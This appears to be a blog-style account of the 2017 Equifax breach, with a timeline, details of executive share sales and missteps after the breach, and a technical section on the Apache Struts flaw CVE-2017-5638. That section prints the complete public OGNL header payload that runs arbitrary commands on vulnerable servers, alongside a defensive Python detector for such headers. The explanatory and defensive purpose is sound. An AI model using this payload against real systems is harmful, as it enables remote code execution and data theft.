
Equifax Breach Timeline

Summary

In 2017 Equifax was breached. The breach was discovered on July 29 and announced on September 7.[5] It wasn't the largest breach of all time, or even of 2017, but it was big and the data was sensitive. Over the two weeks following the announcement, Equifax stock fell from $142.72 to $92.98 (a 34.85% drop).

For comparison, in the same year Yahoo "upgraded" its estimate for the August 2013 breach, stating that it now believed all 3 billion accounts held on its systems had been affected, up from the originally reported 1 billion.[1][2][3] Yahoo noted that the stolen user information may have included names, email addresses, telephone numbers, dates of birth, MD5 hashes of passwords and, in some cases, encrypted or unencrypted security questions and answers.[3]

Additionally, River City Media suffered a security incident that saw 1.37 billion email/postal address records leaked. River City Media clarified that full name, IP address and email address were included for every record, whilst a physical (postal) address was included for "some" accounts.[4]

These breaches dwarf the "approximately 143 million" U.S. consumers that was Equifax's initial estimate, later increased to 145.5 million U.S. consumers affected.[10] Alongside that increase Equifax reported 694,000 affected UK citizens[21] and 8,000 Canadian citizens.[9]

Initially the attack appeared to have taken place from mid-May and to have involved names, Social Security numbers, dates of birth, addresses and, in some cases, credit card numbers and driving license numbers.[6] However, Bloomberg reported an earlier breach in March carried out by the same intruders,[7] although Equifax released a statement denying that the events were related:[8]

“The March event reported by Bloomberg is not related to the criminal hacking that was discovered on 29 July. Mandiant has investigated both events and found no evidence that these two separate events or the attackers were related.”

The latter breach was due to the Apache Struts vulnerability now known as CVE-2017-5638, which was publicly announced on 2017-03-06 along with a fix. An exploit was released as early as 2017-03-07,[18] yet Equifax did not patch the affected system until 2017-07-30,[11] putting the time to patch at 146 days.

The breach was detected on July 29 and, days later, four top managers sold some of their shares in Equifax. The Chief Financial Officer sold 13% of their holdings for $946,374. The President of US Information Solutions sold 9% of their holdings for $584,099. The President of Workforce Solutions sold 4% of their holdings for $250,458. A Senior VP of Investor Relations also sold shares.[13]

A special committee set up by Equifax's board conducted an investigation that held 62 interviews and reviewed 55,000 documents, including emails, text messages and phone logs. It determined that the four had no knowledge of the breach and that the sales did not constitute insider trading; all four had also obtained pre-clearance to sell the stock.[14]

However, the US Justice Department is reportedly investigating the share sales[16] and the Federal Trade Commission is investigating the breach.[17]

Oh, and the CEO blamed a single individual for causing the data breach, by failing to communicate the requirement to apply the patch.[15][20] The CEO nonetheless retired following the breach, receiving a payout of $90,000,000. The Chief Information Officer and Chief Security Officer also both retired following the breach.

On a lighter note, in the period following the announcement of the breach, Equifax's official Twitter account accidentally (and repeatedly) directed users to a phishing site instead of its own information site. It intended to send them to equifaxsecurity2017.com but instead sent them to a look-alike site at securityequifax2017.com set up by a security researcher.[19][23]

Finally, in a further incident, the Equifax Credit Assistance site was found to be serving malicious software posing as an Adobe Flash update. Equifax reportedly corrected this on October 12.[22]


Timeline

Feb 14  Apache is notified of the Struts vulnerability
Mar 6   Apache releases a fix for the vulnerability
Mar 7   An exploit is made available through Exploit-DB
May 14  The day the breach occurred according to an Equifax statement
Jul 29  Equifax detects the breach
Jul 30  The exploited system is patched
Aug 1   The CFO and the President of U.S. Information Solutions sell shares
Aug 2   The President of Workforce Solutions sells shares
Sep 7   Equifax announces the breach
Sep 8   Equifax is criticized because the TrustedID terms force users to waive their right to a class action lawsuit; New York Attorney General Eric Schneiderman demands the removal of the language. Equifax share price is down 13.7% since Sep 7
Sep 9   Equifax Twitter account accidentally and repeatedly directs users to a phishing site
Sep 15  Equifax shares are down 34.85% since the breach announcement; the CSO and CIO announce retirement "effective immediately"
Sep 26  CEO announces retirement and takes a $90,000,000 payout
Oct 2   Equifax raises the number of affected U.S. consumers to 145.5 million and adds 8,000 Canadians
Oct 3   Equifax CEO blames a single individual for the breach
Oct 10  Equifax announces 15.2m UK records compromised, of which 14.5m contain names and dates of birth, while 693,665 contain sensitive information
Oct 12  Equifax announces it has removed malicious software from its Credit Assistance site
Nov 3   Equifax announces it found no wrongdoing in the four executives' share trades


Vulnerability Details

The vulnerability exploited was CVE-2017-5638, an arbitrary command execution vulnerability in the Jakarta Multipart parser of Apache Struts 2 (affected versions 2.3.5 to 2.3.31 and 2.5 to 2.5.10; fixed in 2.3.32 and 2.5.10.1). Several exploits have been written, with an initial proof-of-concept released within 24 hours of the patch.

The vulnerability is triggered by supplying a crafted Content-Type, Content-Disposition or Content-Length header in an HTTP request. When the multipart parser rejects the malformed header, the offending value is copied into the error message, and Struts then passes that message through its localized-text lookup, which evaluates any embedded %{...} or ${...} OGNL expression. A header carrying an OGNL expression therefore leads to arbitrary command execution without any valid upload being needed. For example:

Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='CMD HERE').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
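As an added illustration (not code from the original post or from the Struts project), the following Python check can be run over raw requests or reverse-proxy logs to spot CVE-2017-5638 attempts in the three headers named above. It flags the OGNL opener, and it also rejects values that do not have the shape a genuine header has, because the exploit depends on the multipart parser rejecting the header in the first place. The sample requests, the host name app.example.test and the function names are constructed for this example.

```python
import re
from typing import Dict, List

# Headers the public CVE-2017-5638 exploits inject into. In affected Struts 2
# versions the Jakarta Multipart parser puts the rejected header value into an
# error message that is then evaluated as OGNL.
TARGET_HEADERS = ("content-type", "content-disposition", "content-length")

# OGNL is only evaluated inside %{...} or ${...}; a legitimate value of any of
# the three headers never contains either opener.
OGNL_OPENER = re.compile(r"[%$]\{")

# RFC 7230 token characters. '%' is a token char but '{' is not, so the exploit
# also fails the media-type shape check below.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
WELL_FORMED = {
    "content-type": re.compile(rf"^{_TOKEN}/{_TOKEN}(\s*;.*)?$"),
    "content-disposition": re.compile(rf"^{_TOKEN}(\s*;.*)?$"),
    "content-length": re.compile(r"^\d+$"),
}


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Return the headers of a raw HTTP/1.x request as {lowercase-name: value}."""
    head = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)[0]
    headers: Dict[str, str] = {}
    for line in re.split(r"\r?\n", head)[1:]:  # element 0 is the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def struts_header_findings(raw_request: str) -> List[str]:
    """Flag target headers that carry an OGNL opener or are otherwise malformed.

    An empty list means the request passed. Checking shape as well as the
    opener also catches probes that merely exercise the parser's error path.
    """
    findings: List[str] = []
    for name, value in parse_headers(raw_request).items():
        if name not in TARGET_HEADERS:
            continue
        if OGNL_OPENER.search(value):
            findings.append(f"{name}: OGNL expression opener in header value")
        elif not WELL_FORMED[name].match(value):
            findings.append(f"{name}: malformed value {value[:40]!r}")
    return findings


# Constructed sample requests (not captured traffic).
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----FormBoundary7MA4YWxk\r\n"
    "Content-Length: 138\r\n"
    "\r\n"
)

# Header in the shape of the public exploit, cut down to the recognisable
# prefix; it is not a working payload.
EXPLOIT_ATTEMPT = (
    "POST /struts2-showcase/index.action HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: %{(#_='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='id')}\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

MALFORMED_LENGTH = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: multipart/form-data; boundary=abc\r\n"
    "Content-Length: 12abc\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_UPLOAD), ("exploit", EXPLOIT_ATTEMPT),
                       ("malformed", MALFORMED_LENGTH)):
        print(label, struts_header_findings(req) or "clean")
```

The opener check is the high-confidence signal; the shape check is noisier but worth logging, since a Content-Length that is not an integer or a Content-Type with no type/subtype is exactly what pushes the vulnerable parser onto the error path. Blocking at a proxy is a stopgap only: the fix is upgrading Struts.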


References

1. https://www.theverge.com/2017/10/3/16414306/yahoo-security-data-breach-3-billion-verizon
2. https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/
3. https://help.yahoo.com/kb/account/SLN28451.html?impressions=true
4. https://www.theregister.co.uk/2017/03/07/rcm_email_megaleak/
5. https://investor.equifax.com/news-and-events/news/2017/09-07-2017-213000628
6. https://www.usatoday.com/story/money/2017/09/08/equifax-shares-tumble-after-data-hack-announcement/645146001/
7. https://www.bloomberg.com/news/articles/2017-09-18/equifax-is-said-to-suffer-a-hack-earlier-than-the-date-disclosed
8. https://www.theguardian.com/technology/2017/sep/19/equifax-credit-firm-march-breach-massive-may-hack-customers
9. http://www.bbc.co.uk/news/business-41575188
10. https://www.equifaxsecurity2017.com/frequently-asked-questions/
11. https://securestrategy.co.nz/2017/10/01/what-equifax-did-wrong/
12. https://arstechnica.co.uk/information-technology/2017/09/equifax-hack-started-4-months-before-it-was-detected/?comments=1&post=34027857
13. https://www.theregister.co.uk/2017/11/03/equifax_share_trade_investigation/
14. https://uk.reuters.com/article/uk-equifax-cyber/equifax-clears-executives-who-sold-shares-after-hack-idUKKBN1D31GV
15. https://www.theverge.com/2017/10/3/16410806/equifax-ceo-blame-breach-patch-congress-testimony
16. http://uk.businessinsider.com/equifax-hack-justice-department-investigation-of-alleged-insider-trading-2017-9
17. https://www.theverge.com/2017/9/14/16306872/equifax-breach-ftc-probe-lawsuit-vulnerability
18. https://www.exploit-db.com/exploits/41570/
19. http://www.securityweek.com/equifax-sent-breach-victims-fake-website
20. http://money.cnn.com/2017/09/18/technology/business/equifax-breach-march-earlier/index.html
21. https://www.equifax.co.uk/about-equifax/press-releases/en_gb/-/blogs/equifax-ltd-uk-update-regarding-the-ongoing-investigation-into-us-cyber-security-incident
22. https://krebsonsecurity.com/2017/10/equifax-credit-assistance-site-served-spyware/
23. https://twitter.com/AskEquifax/status/906237250438131716